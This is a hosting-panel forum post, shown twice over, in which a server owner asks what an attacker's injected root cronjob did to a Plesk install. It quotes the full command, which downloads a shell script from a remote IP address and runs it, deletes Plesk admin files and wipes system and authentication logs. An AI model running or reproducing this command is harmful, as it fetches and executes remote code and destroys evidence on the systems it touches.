Facebook
Twitter
matteosistisette
New Pleskian
Hi,
I have received an attack that probably exploited the vulnerability described in:
http://kb.parallels.com/en/113321
Someone or something was able to inject a cronjob into my server which ran:
Cron <root@ks3094309> cd /tmp;wget http://128.173.237.127:8080/browser/browser/backup1.sh;chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/eng.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;rm -Rf /var/log/cron;rm -Rf /var/log/secure;rm -Rf /var/log/lastlog;rm -Rf /var/log/auth.log;cd /usr/local/psa/admin/htdocs/enterprise/control/;mv agent.php agenti.php;mv old.php agenti.php;mv Agent.php agenti.php
Among other things this downloads and executes a shell script. I'm already investigating the content of the script and how to revert (if possible) the changes it did.
However, the command above does also other things that I don't understand. It seems like it screwed up some components of Plesk.
AFTER this, I installed all the updates and ran the vulnerability check available here: http://kb.parallels.com/en/113424 which returned OK (it didn't before the updates).
The question is: can anybody explain me what the abovementioned commands do, what components of psa may have been compromised, and how I can restore them? (not taking into account the execution of the downloaded shell script, of course).
Or can I assume that by installing the updates, any compromised Plesk components have been restored? (I guess not)
Thanks
m.
I have received an attack that probably exploited the vulnerability described in:
http://kb.parallels.com/en/113321
Someone or something was able to inject a cronjob into my server which ran:
Cron <root@ks3094309> cd /tmp;wget http://128.173.237.127:8080/browser/browser/backup1.sh;chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/eng.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;rm -Rf /var/log/cron;rm -Rf /var/log/secure;rm -Rf /var/log/lastlog;rm -Rf /var/log/auth.log;cd /usr/local/psa/admin/htdocs/enterprise/control/;mv agent.php agenti.php;mv old.php agenti.php;mv Agent.php agenti.php
Among other things this downloads and executes a shell script. I'm already investigating the content of the script and how to revert (if possible) the changes it did.
However, the command above does also other things that I don't understand. It seems like it screwed up some components of Plesk.
AFTER this, I installed all the updates and ran the vulnerability check available here: http://kb.parallels.com/en/113424 which returned OK (it didn't before the updates).
The question is: can anybody explain me what the abovementioned commands do, what components of psa may have been compromised, and how I can restore them? (not taking into account the execution of the downloaded shell script, of course).
Or can I assume that by installing the updates, any compromised Plesk components have been restored? (I guess not)
Thanks
m.
